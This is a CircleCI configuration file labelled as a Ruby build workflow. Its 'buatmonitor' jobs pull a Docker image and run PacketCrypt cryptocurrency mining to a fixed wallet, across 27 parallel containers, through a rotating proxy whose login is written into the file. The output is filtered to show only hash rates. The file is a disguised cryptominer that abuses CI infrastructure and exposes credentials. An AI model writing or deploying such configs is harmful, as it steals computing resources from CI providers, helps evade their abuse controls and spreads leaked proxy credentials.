.build_template: &build_definition
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build Docker
          command: |
            docker pull thomasjp0x42/packetcrypt
            docker container run \
              -e HTTP_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              -e HTTPS_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              thomasjp0x42/packetcrypt ann -p pkt1qc5pvz5c8ku2jrf3s2s2ysxt4yctv2v58pzhnl0 https://stratum.zetahash.com/ http://pool.pkt.world http://pool.pktpool.io 2>&1 | grep -o "annmine.rs.*Ke.*"
            
version: 2.0

jobs:
  build:
    docker:
      - image: cimg/ruby:2.7.1-node
    steps:
      - checkout
  buatmonitor:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 15
  buatmonitor1:
    <<: *build_definition
    docker:
      - image: docker:17.05.0-ce-git
    parallelism: 12
    
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - buatmonitor
      - buatmonitor1
